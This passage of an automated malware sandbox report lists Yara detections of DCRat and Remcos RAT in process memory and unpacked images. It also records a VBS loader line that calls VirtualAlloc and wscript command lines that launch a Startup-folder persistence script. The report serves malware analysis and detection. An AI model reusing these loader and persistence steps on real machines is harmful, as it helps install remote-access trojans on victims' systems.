        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Contains functionalty to change the wallpaper
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041C9E2 SystemParametersInfoW,17_2_0041C9E2
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0041C9E2 SystemParametersInfoW,19_2_0041C9E2
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0041C9E2 SystemParametersInfoW,21_2_0041C9E2
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0041C9E2 SystemParametersInfoW,23_2_0041C9E2
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0041C9E2 SystemParametersInfoW,27_2_0041C9E2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000004.00000002.3316092029.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000008.00000002.2081271482.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000006.00000002.2078678717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000004.00000002.3309788726.0000000003118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000004.00000002.3309788726.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000008.00000002.2085488605.0000000005756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000008.00000002.2081271482.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000000A.00000002.2085289507.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 0000000A.00000002.2085289507.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 3160, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 2964, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Potential malicious VBS script found (suspicious strings)
        Source: Initial file: tte.Register "kernel32.dll", "VirtualAlloc", LCase("i=puuu"), LCase("r=p")
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
        Wscript called in batch mode (surpress errors)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
